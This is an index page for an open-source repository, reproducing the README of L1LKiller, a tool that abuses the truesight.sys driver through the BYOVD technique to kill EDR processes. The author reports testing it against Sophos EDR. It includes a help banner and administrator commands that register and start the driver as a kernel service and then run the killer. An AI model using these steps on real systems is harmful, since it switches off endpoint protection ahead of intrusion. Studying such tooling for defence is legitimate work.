Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/brosck/l1lkiller
「⚠️」Performing a BYOVD on the truesight.sys driver
https://github.com/brosck/l1lkiller
byovd development hacking malware offensivesecurity redteam security windows
Last synced: 9 days ago
JSON representation
「⚠️」Performing a BYOVD on the truesight.sys driver
- Host: GitHub
- URL: https://github.com/brosck/l1lkiller
- Owner: brosck
- License: gpl-3.0
- Created: 2024-10-24T01:15:10.000Z (21 days ago)
- Default Branch: main
- Last Pushed: 2024-10-24T12:15:10.000Z (21 days ago)
- Last Synced: 2024-11-01T13:52:30.252Z (13 days ago)
- Topics: byovd, development, hacking, malware, offensivesecurity, redteam, security, windows
- Language: C++
- Homepage:
- Size: 55.7 KB
- Stars: 17
- Watchers: 1
- Forks: 3
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
- License: LICENSE
Awesome Lists containing this project
README
「⚠️」 About L1LKiller
L1LKiller is a tool developed to exploit the `truesight.sys` driver of the Rogue Anti-Malware Driver 3.3 software through the BYOVD (Bring Your Own Vulnerable Driver) technique. About 1 year ago this vulnerability was fixed and currently the driver is present in [LOLDrivers](https://www.loldrivers.io/drivers/e0e93453-1007-4799-ad02-9b461b7e0398/) (Living Off The Land Drivers). I developed this project at the time of the release of the discovery of this driver, where I was able to successfully perform the test on Sophos EDR. Since there is already a mitigation, I decided to publish this project that I kept private for a while.
## Demonstration
https://github.com/user-attachments/assets/e9ec29cb-6869-44c2-8649-0a545c30d2e9
## Help
```
__ _____ __ __ _ ____
/ / < / / / //_/(_) / /__ _____
/ / / / / / ,< / / / / _ \/ ___/
/ /___/ / /___/ /| |/ / / / __/ /
/_____/_/_____/_/ |_/_/_/_/\___/_/[Coded by MrEmpy]
[v1.0]Usage: C:\Windows\Temp\L1LKiller\L1LKiller.exe [OPTIONS]
Options:
single, kill processes only once
loop, kill processes in a loopExamples:
L1LKiller.exe single
L1LKiller.exe loop
```## Usage
In cmd.exe as administrator:
```
sc create l1lkiller binPath="C:\Windows\Temp\L1LKiller\L1LKiller.sys" type=kernel
sc start l1lkiller
L1LKiller.exe single
```